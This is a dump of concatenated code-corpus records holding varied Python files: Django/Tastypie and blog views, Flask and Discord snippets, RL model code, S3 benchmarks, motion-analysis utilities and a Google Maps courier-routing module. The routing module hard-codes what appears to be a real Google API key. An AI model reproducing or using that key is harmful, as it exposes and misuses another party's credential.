ImmediateHttpResponse\nfrom tastypie.serializers import Serializer\nfrom tastypie.resources import NamespacedModelResource, Resource\n\nfrom common.entity import KnownException\nfrom common.functions import get_apiname_from_path\nfrom members.access import get_login_member_details\nfrom members.dataaccess import add_member_activity\n\nclass TastyPieDateSerializer(Serializer):\n def format_date(self, data):\n data = super(TastyPieDateSerializer,self).format_date(data)\n try:\n return datetime.strptime(data, \"%Y-%m-%d\").strftime(\"%d/%m/%Y\")\n except:\n return data\n\nclass SessionAuthentication(_SessionAuthentication):\n def is_authenticated(self, request, **kwargs):\n response = super(SessionAuthentication, self).is_authenticated(request, **kwargs)\n if not response:\n response = http.HttpUnauthorized()\n response.status_code = 403\n return response\n\nclass ACPCResource(Resource):\n def _handle_500(self, request, exception):\n if isinstance(exception, KnownException):\n data = {\n 'error_message': exception.message,\n 'type': 'knownexception',\n }\n return self.error_response(\n request,\n data,\n response_class=http.HttpApplicationError\n )\n else:\n traceback.print_exc()\n return super(ACPCResource, self)._handle_500(request, exception)\n\n def dispatch(self, request_type, request, **kwargs):\n request.member_details = set_member_details(request, request.user)\n return super(ACPCResource, self).dispatch(request_type, request, **kwargs)\n\nclass ACPCNamespacedModelResource(NamespacedModelResource):\n def _handle_500(self, request, exception):\n if isinstance(exception, KnownException):\n data = {\n 'error_message': exception.message,\n 'type': 'knownexception',\n }\n return self.error_response(\n request,\n data,\n response_class=http.HttpApplicationError\n )\n else:\n traceback.print_exc()\n return super(ACPCNamespacedModelResource, self)._handle_500(request, exception)\n\n def dispatch(self, request_type, request, **kwargs):\n request.member_details = set_member_details(request, request.user)\n return super(ACPCNamespacedModelResource, self).dispatch(request_type, request, **kwargs)\n\ndef set_member_details(request, loggedin_member):\n member_details = None\n api_name = get_apiname_from_path(request.path)\n if api_name != \"login_user_detail\":\n if api_name != \"member_activity\":\n log_user_activity(request)\n member_details = get_login_member_details(loggedin_member, api_name, False)\n return member_details\n\ndef log_user_activity(request):\n try:\n if request.user.is_authenticated():\n loggedin_member = request.user\n else:\n loggedin_member = None\n ip_address = get_ip(request)\n url = request.path\n method = request.META.get(\"REQUEST_METHOD\")\n session_key = request.COOKIES.get(\"sessionid\")\n add_member_activity(loggedin_member, session_key, ip_address, url, method)\n except:\n pass\n return True\n","sub_path":"members/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"633989084","text":"#Visualizations of volume traded/percentage difference in trading volume week to week\n\nimport numpy as np\nimport sys\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import figure\n\n\ndef get_vol_traded(stocks_df, stock):\n '''\n This function will create a list, the y coordinates, \n of the percent change in volume traded for the given stock \n '''\n perc_change_vol = []\n #perc_change_vol_df = pd.DataFrame(stocks_df.loc[:, 'percent_change_volume_over_last_wk'])\n row_indices = stocks_df.index[stocks_df['stock'] == stock].tolist()\n row_indices = row_indices[1:]\n for i in range(len(row_indices)):\n perc_change_vol.append(stocks_df.at[row_indices[i], 'percent_change_volume_over_last_wk'])\n return perc_change_vol\n\n\ndef plot_vol_traded(stocks_df, stock, save_file=False):\n first_quar_dates_excluding_first = list(stocks_df.loc[1:11, 'date'])\n second_quar_dates = list(stocks_df.loc[360:372, 'date'])\n dates_excluding_first = first_quar_dates_excluding_first + second_quar_dates\n \n figure(figsize=(25, 12))\n vol_traded = get_vol_traded(stocks_df, stock)\n plt.plot(dates_excluding_first, vol_traded, label = stock)\n plt.legend()\n plt.xlabel('Dates')\n plt.ylabel('Percent Change')\n plt.title('Percent Change in Volume Traded by Week')\n if save_file:\n plt.savefig('./visualizations/vol_traded_' + stock + '.png')\n return plt \n\n\nif __name__ == '__main__':\n stocks_df = pd.read_csv('./final_project.csv')\n stock_list = np.sort(np.unique(stocks_df.stock.values))\n \n # By default generate charts for the first 3 stocks\n default_stocks = stock_list[:3]\n \n # Use stock names from command line arguments, if passed\n arg_stocks = sys.argv[1:]\n \n stocks_to_display = default_stocks if len(arg_stocks) == 0 else arg_stocks\n for stock in stocks_to_display:\n plot_vol_traded(stocks_df, stock, True)","sub_path":"code/volume_traded.py","file_name":"volume_traded.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"530510448","text":"\"\"\"Core functions of the VPG algorithm.\"\"\"\nimport gym\nimport numpy as np\nimport scipy.signal\nimport tensorflow as tf\n\n\nEPS = 1e-8\n\nLOG_STD_MAX = 2\nLOG_STD_MIN = -20\n\n\ndef distribute_value(value, num_proc):\n \"\"\"Adjusts training parameters for distributed training.\n\n In case of distributed training frequencies expressed in global steps have\n to be adjusted to local steps, thus divided by the number of processes.\n \"\"\"\n return max(value // num_proc, 1)\n\n\ndef combined_shape(length, shape=None):\n if shape is None:\n return (length,)\n return (length, shape) if np.isscalar(shape) else (length, *shape)\n\n\ndef discount_cumsum(x, discount):\n \"\"\"Magic from rllab for computing discounted cumulative sums of vectors.\"\"\"\n return scipy.signal.lfilter([1], [1, float(-discount)], x[::-1], axis=0)[\n ::-1]\n\n\n@tf.function\ndef gaussian_likelihood(value, mu, log_std):\n \"\"\"Calculates value's likelihood under Gaussian pdf.\"\"\"\n pre_sum = -0.5 * (\n ((value - mu) / (tf.exp(log_std) + EPS)) ** 2 +\n 2 * log_std + np.log(2 * np.pi)\n )\n return tf.reduce_sum(pre_sum, axis=1)\n\n\ndef mlp(hidden_sizes=(64, 32), activation='relu', output_activation=None,\n layer_norm=False):\n \"\"\"Creates MLP with the specified parameters.\"\"\"\n model = tf.keras.Sequential()\n\n for h in hidden_sizes[:-1]:\n model.add(tf.keras.layers.Dense(units=h, activation=None))\n if layer_norm:\n model.add(tf.keras.layers.LayerNormalization())\n model.add(tf.keras.layers.Activation(activation))\n\n model.add(tf.keras.layers.Dense(units=hidden_sizes[-1], activation=None))\n if layer_norm:\n model.add(tf.keras.layers.LayerNormalization())\n model.add(tf.keras.layers.Activation(output_activation))\n\n return model\n\n\ndef make_actor_discrete(observation_space, action_space, hidden_sizes,\n activation, layer_norm):\n \"\"\"Creates actor tf.keras.Model.\n\n This function can be used only in environments with discrete action space.\n \"\"\"\n\n class DiscreteActor(tf.keras.Model):\n \"\"\"Actor model for discrete action space.\"\"\"\n\n def __init__(self, observation_space, action_space, hidden_sizes,\n activation, layer_norm):\n super().__init__()\n self._act_dim = action_space.n\n\n obs_input = tf.keras.Input(shape=observation_space.shape)\n actor = mlp(\n hidden_sizes=list(hidden_sizes) + [action_space.n],\n activation=activation,\n layer_norm=layer_norm\n )(obs_input)\n\n self._network = tf.keras.Model(inputs=obs_input, outputs=actor)\n\n @tf.function\n def call(self, inputs, training=None, mask=None):\n return tf.nn.log_softmax(self._network(inputs))\n\n @tf.function\n def action(self, observations):\n return tf.squeeze(tf.random.categorical(self(observations), 1),\n axis=1)\n\n @tf.function\n def action_logprob(self, observations, actions):\n return tf.reduce_sum(\n tf.math.multiply(self(observations),\n tf.one_hot(tf.cast(actions, tf.int32),\n depth=self._act_dim)), axis=-1)\n\n return DiscreteActor(observation_space, action_space, hidden_sizes,\n activation, layer_norm)\n\n\ndef make_actor_continuous(action_space, hidden_sizes,\n activation, layer_norm):\n \"\"\"Creates actor tf.keras.Model.\n\n This function can be used only in environments with continuous action space.\n \"\"\"\n\n class ContinuousActor(tf.keras.Model):\n \"\"\"Actor model for continuous action space.\"\"\"\n\n def __init__(self, action_space, hidden_sizes,\n activation, layer_norm):\n super().__init__()\n self._action_dim = action_space.shape\n\n self._body = mlp(\n hidden_sizes=list(hidden_sizes),\n activation=activation,\n layer_norm=layer_norm\n )\n\n self._mu = tf.keras.layers.Dense(self._action_dim[0], name='mean')\n self._log_std = tf.Variable(\n initial_value=-0.5 * np.ones(shape=(1,) + self._action_dim,\n dtype=np.float32), trainable=True,\n name='log_std_dev')\n\n @tf.function\n def call(self, inputs, training=None, mask=None):\n x = self._body(inputs)\n mu = self._mu(x)\n log_std = tf.clip_by_value(self._log_std, LOG_STD_MIN, LOG_STD_MAX)\n\n return mu, log_std\n\n @tf.function\n def action(self, observations):\n mu, log_std = self(observations)\n std = tf.exp(log_std)\n return mu + tf.random.normal(tf.shape(input=mu)) * std\n\n @tf.function\n def action_logprob(self, observations, actions):\n mu, log_std = self(observations)\n return gaussian_likelihood(actions, mu, log_std)\n\n return ContinuousActor(action_space, hidden_sizes,\n activation, layer_norm)\n\n\ndef make_critic(observation_space, hidden_sizes, activation):\n \"\"\"Creates critic tf.keras.Model\"\"\"\n obs_input = tf.keras.Input(shape=observation_space.shape)\n\n critic = tf.keras.Sequential([\n mlp(hidden_sizes=list(hidden_sizes) + [1],\n activation=activation),\n tf.keras.layers.Reshape([]),\n ])(obs_input)\n\n return tf.keras.Model(inputs=obs_input, outputs=critic)\n\n\ndef mlp_actor_critic(observation_space, action_space, hidden_sizes=(64, 32),\n activation=tf.tanh, layer_norm=False):\n \"\"\"Creates actor and critic tf.keras.Model-s.\"\"\"\n actor = None\n\n # default policy builder depends on action space\n if isinstance(action_space, gym.spaces.Discrete):\n actor = make_actor_discrete(observation_space, action_space,\n hidden_sizes,\n activation, layer_norm)\n elif isinstance(action_space, gym.spaces.Box):\n actor = make_actor_continuous(action_space,\n hidden_sizes,\n activation, layer_norm)\n\n critic = make_critic(observation_space, hidden_sizes, activation)\n\n return actor, critic\n","sub_path":"spinup_bis/algos/tf2/vpg/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":6401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"386838805","text":"from flask import Flask, jsonify\n\napp= Flask(__name__)\n\ndb=[\"Apple\",\"Mango\",\"Banana\"]\n\n@app.route(\"/\")\ndef index():\n\treturn jsonify({\"message\":\"Hello World!\"})\n\n@app.route(\"/fruits\", methods=['GET'])\ndef get_fruits():\n\treturn jsonify({\"fruits\":db})\n\n@app.route(\"/fruits/\", methods=['POST'])\ndef add_fruit(fruitName):\n\tdb.append(fruitName)\n\treturn jsonify({\"fruits\":db})\n\n@app.route(\"/fruits/\", methods=['GET'])\ndef get_specific_fruit(fruitID):\n\tif fruitID>0 and fruitID<=len(db):\n\t\treturn jsonify({\"fruit\":db[fruitID-1]})\n\telse:\n\t\treturn jsonify({\"fruit\":\"\"})\n\n\n\nif __name__ ==\"__main__\":\n\tapp.run(debug=True)","sub_path":"Codes/simple_post_request.py","file_name":"simple_post_request.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"38521494","text":"from types import MethodType\n\nclass Student(object):\n def __init__(self,age): # 定义一个函数作为实例方法\n self.age=age\n\ndef old(self):\n print('年纪是%s'%self.age)\n\n@classmethod\ndef set_score(cls, score):\n cls.score = score\n print(cls.score)\n\n\ns = Student(20)\ns1=Student(30)\n#Student.set_score = MethodType(set_score, Student) # 给实例绑定一个方法\nStudent.set_score=set_score\ns.set_score(50) # 调用实例方法\ns1.set_score(60)\n\n\n\n","sub_path":"第一期/上海-棒棒糖/第二次任务-每日代码练习/2018-3/3-8/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"543148587","text":"import pika\r\nimport json\r\nimport sqlite3\r\nimport os\r\nimport controller\r\n\r\n\r\ndef callback(ch, method, properties, body):\r\n body_data = json.loads(body)\r\n print(\"Message received: %r\" % body_data)\r\n ch.basic_ack(delivery_tag= method.delivery_tag)\r\n path = body_data['db_path']\r\n if path is not None:\r\n create_connection(path)\r\n\r\n\r\ndef create_connection(path):\r\n print(path)\r\n with sqlite3.connect(path) as connection:\r\n print(\"First query: \\n\")\r\n table = controller.purchases_amount(connection)\r\n print(\"query1 Headers: \" + str(controller.get_columns_names(connection, \"query1\")))\r\n controller.create_table(connection, \"query1\", table)\r\n # path = r'%s' % os.getcwd().replace('\\\\', '/')\r\n controller.create_csv(table, \"first\")\r\n print(\r\n \"***********************************************************************************************************\")\r\n\r\n print(\"Second query: \\n\")\r\n table = controller.purchased_items_amount(connection)\r\n print(\"query2 Headers: \" + str(controller.get_columns_names(connection, \"query2\")))\r\n controller.create_table(connection, \"query2\", table)\r\n # path = r'%s' % os.getcwd().replace('\\\\', '/')\r\n controller.create_csv(table, \"second\")\r\n print(\r\n \"***********************************************************************************************************\")\r\n\r\n print(\"Third query: \\n\")\r\n table = controller.purchased_albums(connection)\r\n controller.create_json(table, \"third\")\r\n print(\r\n \"***********************************************************************************************************\")\r\n\r\n print(\"Fourth query: \\n\")\r\n data = controller.disc_purchase_count(connection, \"2013\", \"Canada\")\r\n path = r'%s' % os.getcwd().replace('\\\\', '/')\r\n controller.create_xml(data, \"fourth\")\r\n print(\"query4 Headers: \" + str(controller.get_columns_names(connection, \"query4\")))\r\n controller.create_table(connection, \"query4\", data)\r\n print(\r\n \"***********************************************************************************************************\")\r\n\r\ntry:\r\n connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\r\n channel = connection.channel()\r\n channel.queue_declare(queue='my_queue1', durable=True)\r\n channel.basic_consume(callback,queue='my_queue1')\r\n channel.basic_qos(prefetch_count=1)\r\n print(\"Waiting for messages...\")\r\n channel.start_consuming()\r\n\r\n\r\n\r\nexcept Exception as exception:\r\n print(\"Exception\")\r\n exception.with_traceback()\r\nfinally:\r\n connection.close()\r\n","sub_path":"reciever/recive.py","file_name":"recive.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"539101088","text":"import time\n\nimport boto3\nimport fsspec\nimport h5py\nimport pytest\nimport requests\nimport s3fs\nimport tifffile\nfrom botocore import UNSIGNED\nfrom botocore.client import Config\n\nfs = s3fs.S3FileSystem(\n anon=True, client_kwargs={\"endpoint_url\": \"http://localhost:9000\"}\n)\n\nb3 = boto3.client(\n \"s3\",\n endpoint_url=\"http://localhost:9000\",\n config=Config(signature_version=UNSIGNED),\n)\n\n\ndef local(filename, loader=None):\n start = time.time()\n with open(f\"data/{filename}\", \"rb\") as o:\n if loader:\n loader(o)\n else:\n o.read()\n stop = time.time()\n return stop - start\n\n\ndef http(filename, loader=None):\n url = f\"http://localhost:8000/{filename}\"\n if loader:\n with fsspec.open(url) as f:\n loader(f)\n else:\n elapsed = requests.get(f\"http://localhost:8000/{filename}\").elapsed\n return elapsed.microseconds / 1000000\n\n\ndef boto3(filename, loader=None):\n\n if loader is not None:\n pytest.skip()\n\n start = time.time()\n rsp = b3.get_object(Bucket=\"data\", Key=filename)\n rsp[\"Body\"].read()\n stop = time.time()\n return stop - start\n\n\ndef s3fs(filename, loader=None):\n start = time.time()\n with fs.open(f\"data/{filename}\") as f:\n if loader:\n loader(f)\n else:\n f.read()\n stop = time.time()\n return stop - start\n\n\n@pytest.mark.parametrize(\"method\", (local, http, boto3, s3fs))\ndef test_1_byte_overhead(benchmark, method):\n benchmark(method, \"1-byte\")\n\n\n@pytest.mark.parametrize(\"method\", (local, http, boto3, s3fs))\ndef test_zarr_chunk(benchmark, method):\n benchmark(method, \"retina_large.ome.zarr/0/0.0.0.0.0\")\n\n\n@pytest.mark.parametrize(\"method\", (local, http, boto3, s3fs))\ndef test_tiff_tile(benchmark, method):\n def loader(opened_file):\n with tifffile.TiffFile(opened_file) as tif:\n fh = tif.filehandle\n for page in tif.pages:\n fh.seek(page.dataoffsets[0])\n fh.read(page.databytecounts[0])\n return\n\n benchmark(method, \"retina_large.ome.tiff\", loader)\n\n\n@pytest.mark.parametrize(\"method\", (local, http, boto3, s3fs))\ndef test_hdf5_chunk(benchmark, method):\n def loader(opened_file):\n with h5py.File(opened_file) as f:\n data = f[\"DataSet\"][\"ResolutionLevel 0\"][\"TimePoint 0\"][\"Channel 0\"][\"Data\"]\n chunks = data.chunks\n len(data[0:chunks[0]-1, 0:chunks[1]-1, 0:chunks[2]-1])\n\n benchmark(method, \"retina_large.ims\", loader)\n\n\n@pytest.mark.parametrize(\"method\", (local, http, boto3, s3fs))\ndef test_download_1(benchmark, method):\n def loader(opened_file):\n opened_file.read()\n\n benchmark(method, \"retina_large.ims\", loader)\n\n\n@pytest.mark.parametrize(\"method\", (local, http, boto3, s3fs))\ndef test_download_2(benchmark, method):\n benchmark(method, \"retina_large.ims\")\n","sub_path":"t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"385504597","text":"from discord.ext import commands\n\n\n# New - The Cog class must extend the commands.Cog class\n\n\nclass Basic(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n # Define a new command\n @commands.command(\n name='ping',\n description='The ping command',\n aliases=['p']\n )\n async def ping_command(self, ctx):\n\t await ctx.send(\"pong\")\n\n\ndef setup(bot):\n bot.add_cog(Basic(bot))\n # Adds the Basic commands to the bot\n # Note: The \"setup\" function has to be there in every cog file\n","sub_path":"src/cogs/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"401241026","text":"import networkx as nx\nimport numpy as np\nfrom Subgraphs import star as st, read as rd\n\nraw = rd.read_samples()\ngraphs = []\nfor r in raw:\n m = np.matrix(r)\n g = nx.from_numpy_matrix(m)\n graphs.append(g)\n\ncnt = 1\nfor r in graphs:\n f = open(\"OUT/S1_3/\"+str(cnt)+\".txt\",\"w\")\n f.write(str(st.count_star(r)))\n f.close()\n cnt += 1\n","sub_path":"executables/Test06.py","file_name":"Test06.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"646669498","text":"\"\"\"\nMisc utility functions used in detection/quantification of STS transfers\n\nLukas Adamowicz\n2019-2020\nPfizer\n\"\"\"\n\nfrom numpy import zeros, ceil, mean, std, around, gradient, where, diff, insert, append, array, savetxt\nfrom numpy.lib import stride_tricks\nimport h5py\nimport udatetime as udt\n\n\n__all__ = ['tabulate_results']\n\n\ndef tabulate_results(results, csv_path, method='stillness'):\n \"\"\"\n Tabulate the results as calculated by the sequential pipeline.\n\n Parameters\n ----------\n results : {dict, str}\n Either a dictionary of the results, or the path to the h5 file where the results were stored.\n csv_path : str\n Path to save the tabular data at\n method : {'stillness', 'displacement'}, optional\n Which method to tabulate results for. Default is 'stillness'.\n \"\"\"\n # get the results\n days, times, duration, vdisp, mxa, mna, sparc = [], [], [], [], [], [], []\n mtd = f'{method.capitalize()} Method'\n if isinstance(results, dict):\n day_list = [i for i in results['Processed']['Sit2Stand'] if 'Day' in i]\n\n for day in day_list:\n days.extend([int(day[4:])] * results['Processed']['Sit2Stand'][day][mtd]['STS Times'].shape[0])\n times.extend(results['Processed']['Sit2Stand'][day][mtd]['STS Times'])\n duration.extend(results['Processed']['Sit2Stand'][day][mtd]['Duration'])\n vdisp.extend(results['Processed']['Sit2Stand'][day][mtd]['Vertical Displacement'])\n mxa.extend(results['Processed']['Sit2Stand'][day][mtd]['Max. Accel.'])\n mna.extend(results['Processed']['Sit2Stand'][day][mtd]['Min. Accel.'])\n sparc.extend(results['Processed']['Sit2Stand'][day][mtd]['SPARC'])\n else:\n with h5py.File(results, 'r') as f:\n day_list = [i for i in f['Processed/Sit2Stand'] if 'Day' in i]\n\n for day in day_list:\n days.extend([int(day[4:])] * f[f'Processed/Sit2Stand/{day}/{mtd}/STS Times'].shape[0])\n times.extend(f[f'Processed/Sit2Stand/{day}/{mtd}/STS Times'])\n duration.extend(f[f'Processed/Sit2Stand/{day}/{mtd}/Duration'])\n vdisp.extend(f[f'Processed/Sit2Stand/{day}/{mtd}/Vertical Displacement'])\n mxa.extend(f[f'Processed/Sit2Stand/{day}/{mtd}/Max. Accel.'])\n mna.extend(f[f'Processed/Sit2Stand/{day}/{mtd}/Min. Accel.'])\n sparc.extend(f[f'Processed/Sit2Stand/{day}/{mtd}/SPARC'])\n\n table = zeros((len(days), 12), dtype='object')\n table[:, 0] = days\n table[:, 1:3] = array(times)\n table[:, 7] = duration\n # table[:, 8] = vdisp\n table[:, 9] = mxa\n table[:, 10] = mna\n table[:, 11] = sparc\n\n for i, ts in enumerate(table[:, 1]):\n dt = udt.utcfromtimestamp(ts)\n table[i, 3] = dt.strftime('%Y-%m-%d %H:%M:%S.%f')\n table[i, 4] = dt.hour\n table[i, 5] = dt.minute\n table[i, 6] = dt.weekday() >= 5 # is the day a weekend. 0=Monday, 6=Sunday\n\n hdr = 'Day,Start Unix Time,End Unix Time,Start Time,Hour,Minute,Weekend,Duration,Vertical Displacement,' \\\n 'Max. Accel.,Min. Accel., SPARC'\n fmt = '%d, %f, %f, %s, %i, %i, %s, %f, %f, %f, %f, %f'\n savetxt(csv_path, table, header=hdr, fmt=fmt)\n\n\ndef mov_stats(seq, window):\n \"\"\"\n Compute the centered moving average and standard deviation.\n\n Parameters\n ----------\n seq : numpy.ndarray\n Data to take the moving average and standard deviation on.\n window : int\n Window size for the moving average/standard deviation.\n\n Returns\n -------\n m_mn : numpy.ndarray\n Moving average\n m_st : numpy.ndarray\n Moving standard deviation\n pad : int\n Padding at beginning of the moving average and standard deviation\n \"\"\"\n\n def rolling_window(x, wind):\n if not x.flags['C_CONTIGUOUS']:\n raise ValueError(\"Data must be C-contiguous to be able to window for moving statistics\")\n shape = x.shape[:-1] + (x.shape[-1] - wind + 1, wind)\n strides = x.strides + (x.strides[-1],)\n return stride_tricks.as_strided(x, shape=shape, strides=strides)\n\n m_mn = zeros(seq.shape)\n m_st = zeros(seq.shape)\n\n if window < 2:\n window = 2\n\n pad = int(ceil(window / 2))\n\n rw_seq = rolling_window(seq, window)\n\n n = rw_seq.shape[0]\n\n m_mn[pad:pad + n] = mean(rw_seq, axis=-1)\n m_st[pad:pad + n] = std(rw_seq, axis=-1, ddof=1)\n\n m_mn[:pad], m_mn[pad + n:] = m_mn[pad], m_mn[-pad - 1]\n m_st[:pad], m_st[pad + n:] = m_st[pad], m_st[-pad - 1]\n return m_mn, m_st, pad\n\n\ndef get_stillness(filt_accel, dt, window, gravity, thresholds):\n \"\"\"\n Stillness determination based on filtered acceleration magnitude and jerk magnitude\n\n Parameters\n ----------\n filt_accel : numpy.ndarray\n 1D array of filtered magnitude of acceleration data, units of m/s^2\n dt : float\n Sampling time, in seconds\n window : float\n Moving statistics window length, in seconds\n gravity : float\n Gravitational acceleration, as measured by the sensor during static periods.\n thresholds : dict\n Dictionary of the 4 thresholds to be used - accel moving avg, accel moving std, \n jerk moving avg, and jerk moving std. \n Acceleration average thresholds should be for difference from gravitional acceleration.\n\n Returns\n -------\n still : numpy.ndarray\n (N, ) boolean array of stillness (True)\n starts : numpy.ndarray\n (Q, ) array of indices where stillness starts. Includes index 0 if still[0] is True. Q < (N/2)\n stops : numpy.ndarray\n (Q, ) array of indices where stillness ends. Includes index N-1 if still[-1] is True. Q < (N/2)\n \"\"\"\n # compute the sample window length from the time value\n n_window = int(around(window / dt))\n # compute the acceleration moving stats\n acc_rm, acc_rsd, _ = mov_stats(filt_accel, n_window)\n # compute the jerk\n jerk = gradient(filt_accel, dt, edge_order=2)\n # compute the jerk moving stats\n jerk_rm, jerk_rsd, _ = mov_stats(jerk, n_window)\n\n # create the stillness masks\n arm_mask = abs(acc_rm - gravity) < thresholds['accel moving avg']\n arsd_mask = acc_rsd < thresholds['accel moving std']\n jrm_mask = abs(jerk_rm) < thresholds['jerk moving avg']\n jrsd_mask = jerk_rsd < thresholds['jerk moving std']\n\n still = arm_mask & arsd_mask & jrm_mask & jrsd_mask\n starts = where(diff(still.astype(int)) == 1)[0]\n stops = where(diff(still.astype(int)) == -1)[0]\n\n if still[0]:\n starts = insert(starts, 0, 0)\n if still[-1]:\n stops = append(stops, len(still) - 1)\n\n return still, starts, stops","sub_path":"sit2standpy/v2/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":6669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"148680771","text":"\n\na=[]\nf = open(\"text\", \"r\")\nfor line in f.readlines():\n\ttemp = line.split(' ')\n\ttext=\"\"\n\tfor i in range(1,len(temp)-1):\n\t\ttext=text+temp[i]+\" \"\n\ttext=text+temp[len(temp)-1]\n\ta.append(text)\na.sort()\nout=\"\"\nfor i in range(0,len(a)):\n\tout=out+a[i]\nprint(out)\nf.close()\n\n","sub_path":"Speech RecognitionCode/recipe/corpus/LM/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"427893635","text":"from django.shortcuts import render, redirect\nfrom .forms import LoginForm, SignupForm, CreateBlog\nfrom .models import Blog\nfrom django.contrib.auth import login as django_login, logout as django_logout, authenticate\n\n# Create your views here.\ndef home(request):\n return render(request, 'index.html')\n\ndef test(request):\n if request.method == 'POST':\n form = CreateBlog(request.POST)\n\n if form.is_valid():\n form.cleaned_data['author'] = request.user\n form.save()\n return redirect('test')\n form.add_error(None, '입력 제대로 하세요')\n else:\n form = CreateBlog()\n blog = Blog.objects.all()\n page = request.user\n return render(request, 'test.html', {'form':form, 'blog':blog, 'page':page})\n\ndef login(request):\n if request.method == 'POST':\n # 로그인 성공 후 이동할 URL. 주어지지 않으면 None\n next = request.GET.get('next')\n\n # Data bounded form인스턴스 생성\n # AuthenticationForm의 첫 번째 인수는 해당 request가 되어야 한다\n login_form = LoginForm(request=request, data=request.POST)\n\n # 유효성 검증에 성공할 경우\n # AuthenticationForm을 사용하면 authenticate과정까지 완료되어야 유효성 검증을 통과한다\n if login_form.is_valid():\n # AuthenticatonForm에서 인증(authenticate)에 성공한 유저를 가져오려면 이 메서드를 사용한다\n user = login_form.get_user()\n # Django의 auth앱에서 제공하는 login함수를 실행해 앞으로의 요청/응답에 세션을 유지한다\n django_login(request, user)\n # next가 존재하면 해당 위치로, 없으면 Post목록 화면으로 이동\n return redirect(next if next else 'test')\n # 인증에 실패하면 login_form에 non_field_error를 추가한다\n login_form.add_error(None, '아이디 또는 비밀번호가 올바르지 않습니다')\n else:\n login_form = LoginForm()\n\n context = {\n 'login_form': login_form,\n }\n return render(request, 'login.html', context)\n\ndef signup(request):\n if request.method == 'POST':\n signup_form = SignupForm(request.POST)\n # 유효성 검증에 통과�� 경우 (username의 중복과 password1, 2의 일치 여부)\n if signup_form.is_valid():\n # 유저를 생성 후 해당 User를 로그인 시킨다\n user = signup_form.save()\n django_login(request, user)\n return redirect('test')\n else:\n signup_form = SignupForm()\n\n context = {\n 'signup_form': signup_form,\n }\n return render(request, 'signup.html', context)\n\ndef logout(request):\n django_logout(request)\n return redirect('/')","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"526771979","text":"import gmplot\nfrom src.utils.request_with_cache import get\nfrom src.solution.algorithm import cocktailSort\nfrom src.constant import html\n\nAPIKey = 'AIzaSyB7nJMebT6DAXDxqcZRO6rCovT7imtmyXE'\n\n\n# Get the distance from origin to destination\ndef __getDistance(origins, destinations):\n baseUrl = \"https://maps.googleapis.com/maps/api/distancematrix/json\"\n params = {\n \"origins\": \"|\".join(f\"{x},{y}\" for x, y in origins),\n \"destinations\": \"|\".join(f\"{x},{y}\" for x, y in destinations),\n \"key\": APIKey\n }\n\n data = get(baseUrl, params)\n distance = data['rows'][0]['elements'][0]['distance']['value']\n return distance\n\n\ndef plotMap(couriers, customers):\n # Initialize gmplot\n gmaps = [gmplot.GoogleMapPlotter(*customer.originCoords, zoom=11,\n apikey=APIKey, title=f\"Customer {customer.ID}\") for customer in customers]\n\n # mark courier company on map\n for gmap in gmaps:\n for courier in couriers:\n gmap.marker(*courier.coordinate, title=courier.name, label='H',\n info_window='Delivery Hub: {} ({} {})'.format(courier.location, *courier.coordinate))\n\n # Calculate the best route based on shortest distance for all courier company\n for customer, gmap in zip(customers, gmaps):\n\n # Get distance from origin to destination without going through the hub\n customer.distance = __getDistance([customer.originCoords], [customer.desCoords]) / 1000\n\n for courier in couriers:\n # Get distance from origin to destination go through hub\n distance1 = __getDistance([customer.originCoords], [courier.coordinate])\n distance2 = __getDistance([courier.coordinate], [customer.desCoords])\n totalDistance = (distance1 + distance2) / 1000\n customer.distanceThrough(courier, totalDistance)\n\n sortedCouriers = cocktailSort(customer.distanceWithHub)\n\n customer.minimumDistance = sortedCouriers[0][1]\n customer.minDistanceHub = sortedCouriers[0][0].name\n\n sortedCouriers.reverse()\n for i, courierWithDist in enumerate(sortedCouriers):\n colour, zIndex = ('red', 2) if i == len(sortedCouriers) - 1 else ('blue', 0)\n\n gmap.directions(customer.originCoords, customer.desCoords, color=colour, zIndex=zIndex,\n waypoints=[courierWithDist[0].coordinate])\n\n # Plot direction for shortest route in map for each customer\n gmap.directions(customer.originCoords, customer.desCoords, color='black', zIndex=1)\n\n # Draw the map to an HTML file:\n gmap.draw(f\"{html}/customer{customer.ID}.html\")\n","sub_path":"src/solution/distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"189897882","text":"# Useful utilities for all calendar pages\nfrom __future__ import print_function, division\nimport os, json, subprocess, time, stat\nfrom sqlalchemy import *\n\nfrom event import calevent\nfrom parse import parse_ics, parse_xml\n\t\n\ndef get_feed_data():\n\t'''\t\n\t\tDESCRIPTION: 